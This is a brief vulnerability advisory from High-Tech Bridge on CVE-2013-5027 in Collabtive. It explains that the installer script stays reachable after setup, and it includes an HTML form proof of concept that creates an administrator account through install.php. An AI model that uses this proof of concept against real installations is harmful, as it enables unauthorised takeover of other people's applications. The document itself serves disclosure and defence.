High-Tech Bridge SA Security Research Lab has discovered vulnerability in Collabtive, which can be exploited to gain complete control over the application.
- Improper Access Control in Collabtive: CVE-2013-5027
The vulnerability exists due to improper access restrictions to the third installation step after successfully installing the application. A remote attacker can send a specially crafted HTTP POST request to the “/install.php” script and create a new user with administrative privileges. The installation script is not deleted after application installation and is publicly available by default.
The following exploitation example creates a user with login “newadmin” and password “newpass”:
<form action=“http://[host]/install.php?action=step3” method=“post” name=“main”>
<input type=“hidden” name=“name” value=“newadmin”>
<input type=“hidden” name=“pass” value=“newpass”>
<input type=“submit” id=“btn”>
</form>